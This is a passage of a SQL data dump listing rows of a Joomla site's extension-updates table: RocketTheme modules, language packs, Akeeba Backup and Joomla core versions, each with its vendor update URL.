Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(20785,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(20786,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(20787,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(20788,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(20789,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(20790,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(20791,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(20792,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(20793,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(20794,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(20795,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(20796,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(20797,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(20798,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(20799,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(20800,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20801,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20802,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20803,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20804,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20805,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20806,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20807,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20808,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20809,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20810,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20811,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20812,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20813,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20814,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20815,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20816,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20817,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20818,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20819,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20820,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20821,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20822,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20823,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20824,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20825,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20826,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20827,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20828,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(20829,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(20830,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(20831,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(20832,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(20833,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(20834,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(20835,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(20836,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(20837,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(20838,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(20839,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(20840,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(20841,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(20842,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(20843,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(20844,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(20845,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20846,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20847,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20848,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(20849,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(20850,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(20851,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(20852,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(20853,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(20854,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(20855,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(20856,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20857,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20858,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20859,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20860,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20861,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20862,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20863,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20864,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20865,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20866,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20867,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20868,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20869,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20870,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20871,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20872,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20873,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20874,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20875,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20876,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20877,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20878,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20879,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20880,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20881,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20882,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20883,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20884,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(20885,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(20886,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(20887,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(20888,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(20889,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(20890,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(20891,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(20892,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(20893,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(20894,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(20895,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(20896,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(20897,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20898,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(20899,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(20900,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(20901,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(20902,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(20903,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(20904,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(20905,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(20906,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(20907,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(20908,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(20909,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(20910,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(20911,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(20912,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(20913,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(20914,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(20915,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20916,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20917,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20918,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20919,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20920,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20921,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20922,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20923,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20924,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20925,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20926,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20927,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20928,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20929,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20930,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20931,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20932,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20933,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20934,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20935,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20936,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20937,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20938,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20939,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20940,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20941,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20942,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20943,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(20944,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(20945,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(20946,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(20947,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(20948,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(20949,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(20950,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(20951,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(20952,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(20953,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(20954,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(20955,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(20956,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(20957,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(20958,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(20959,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(20960,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20961,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20962,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20963,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(20964,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(20965,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(20966,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(20967,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(20968,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(20969,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(20970,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(20971,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20972,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20973,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20974,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20975,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20976,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20977,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20978,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20979,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20980,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20981,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20982,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20983,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20984,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20985,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20986,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20987,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20988,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20989,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20990,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20991,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20992,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20993,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20994,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20995,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20996,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20997,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20998,3,0,'Serbian 